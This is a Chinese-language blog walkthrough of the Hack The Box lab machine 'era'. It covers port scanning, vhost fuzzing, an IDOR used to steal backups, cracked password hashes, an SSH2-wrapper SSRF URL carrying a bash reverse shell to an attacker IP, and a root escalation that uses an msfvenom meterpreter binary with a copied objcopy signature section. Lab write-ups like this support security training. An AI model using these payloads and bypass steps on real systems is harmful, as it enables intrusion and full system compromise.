HTB赛季8靶场 - era

发布于:2025-07-30 ⋅ 阅读:(54) ⋅ 点赞:(0)

在这里插入图片描述

nmap扫描

└─$ nmap -p- --min-rate 1000 -T4 10.129.137.201 -oA nmapfullscan                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-27 21:19 EDT
Warning: 10.129.137.201 giving up on port because retransmission cap hit (6).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 30.47% done; ETC: 21:21 (0:01:13 remaining)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.06% done; ETC: 21:21 (0:00:58 remaining)
Nmap scan report for 10.129.137.201
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 157.41 seconds

ffuf扫描vhost

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb'

![[Pasted image 20250728101147.png]]

![[Pasted image 20250728101240.png]]

dirsearch扫描页面

dirsearch -u http://file.era.htb/

![[Pasted image 20250728102347.png]]

注册账号并登录
![[Pasted image 20250728102402.png]]

IDOR窃取备份

http://file.era.htb/download.php?id=54&dl=true
http://file.era.htb/download.php?id=150&dl=true

![[Pasted image 20250728102941.png]]

我们爬取sqlite3DB文件
![[Pasted image 20250728141506.png]]

离线破解密码

$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

我们用备份数据库里面的内容无法成功登陆,故修改问题答案
![[Pasted image 20250728155554.png]]

SSH2 + SSRF = RCE

登录admin_ef01cab31aa
![[Pasted image 20250728155620.png]]

我们分析源码可知fopen处存在漏洞,只要我们是管理员账户,我们便可以成功控制fopen函数。
![[Pasted image 20250728161833.png]]

![[Pasted image 20250728161933.png]]

那么我们可以尝试使用账号密码来执行一下命令了。

http://file.era.htb/download.php?id=6785&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;

![[Pasted image 20250728162004.png]]
![[Pasted image 20250728162017.png]]

objcopy sh文件自检绕过

上linpeas.sh搜查
![[Pasted image 20250728163723.png]]

上pspy64监控定时任务
![[Pasted image 20250728164135.png]]

我们且对monitor文件可写,我们生成shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f elf -o reverse.elf

传输到受害机器,然后我们提取monitor的特征码(因为直接替换貌似不执行monitor,怀疑存在检测)

#提取monitor的特征码
objcopy --dump-section .text_sig=sig monitor

#添加monitor的特征码到恶意文件
objcopy --add-section .text_sig=sig reverse.elf

开启msf监听,然后复制bypass后的恶意文件到monitor

cp reverse.elf monitor

最终我们会获取一个shell
![[Pasted image 20250728174208.png]]

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布